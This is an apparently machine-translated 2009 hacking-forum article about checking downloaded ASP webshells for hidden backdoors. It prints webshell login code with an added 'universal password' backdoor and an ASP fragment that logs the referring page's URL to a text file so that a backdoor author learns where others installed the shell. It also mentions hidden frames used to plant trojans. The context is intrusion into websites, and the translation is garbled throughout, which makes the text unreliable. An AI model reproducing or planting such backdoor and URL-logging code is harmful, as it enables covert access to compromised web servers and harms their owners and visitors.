With a simple asp Trojan back door, to find a asp Backdoor Trojan-exploit-warning-the black bar safety net

2009-07-05T00:00:00
ID MYHACK58:62200923740
Type myhack58
Reporter 佚名
Modified 2009-07-05T00:00:00

Description

I waited for the side dishes yourself not write to asp of the horse, only with prawns to write, but the online streaming of all don't know is the several hand, it is inevitable that some ill-intentioned people will be on the inside plus the back door.

Finally get to a shell and be someone stole how willing Ah! So the next complete asp Trojan after the first check there is no back door, typically a back door to privacy, will be encrypted! So first we have to start the decryption asp Trojan decryption tool to decrypt after the first check the Universal password, that is even if you changed the Trojans the password, he can also use this password to log in

Normal: EnD fUNCtION IF SEssIoN("web2a2dmin")<>UsERpaSs thEn IF requeSt. FoRM("pass")<>"" TheN iF REquesT. foRM("pass")=uSERPASS Then SEsSIoN("web2a2dmin")=uSERPAss rESPOnsE. rEdirEct Url ELse rrs"sorry,the password validation failed!"

Added universal password: EnD fUNCtION IF SEssIoN("web2a2dmin")<>UsERpaSs thEn IF requeSt. FoRM("pass")<>"" TheN iF REquesT. foRM("pass")=uSERPASS or request. form("pass")="1 1 1 1 1 1 1" Then SEsSIoN("web2a2dmin")=uSERPAss rESPOnsE. rEdirEct Url ELse rrs"sorry,the password validation failed!"

1 1 1 1 1 1 1 is the legendary universal password.

Find the Universal password code after the or request. form("pass")="1 1 1 1 1 1 1" delete it OK!

Below to find the horse most like to use the framework to hang Horse: the

Found after delete, this asp Backdoor even Removed!

The following teach you the back door of the principle:

This is a period of receipt of the letter of the asp code will save it as 1. asp

|

The following is quoted fragment: set fs=server. CreateObject("Scripting. FileSystemObject") set file=fs. OpenTextFile(server. MapPath("bobo.txt"),8,True) file. writeline the url file. close set file=nothing set fs=nothing %>


Code basic meaning is:“HTTP_REFERER” link to the current page, the previous page's URL address Simple to say is to get a webshell address is then recorded in the bobo. txt here text

Uploaded to the space such as <http://127.0.0.1/1.asp>

The following is quoted fragment:


The plug to the asp Trojan,then someone else access to this is to hang the horse's asp Trojan will generate a bobo. txt inside it will have an asp in Malaysia path.

We learn he is in order to better understand, we don't used to the whole rookie it!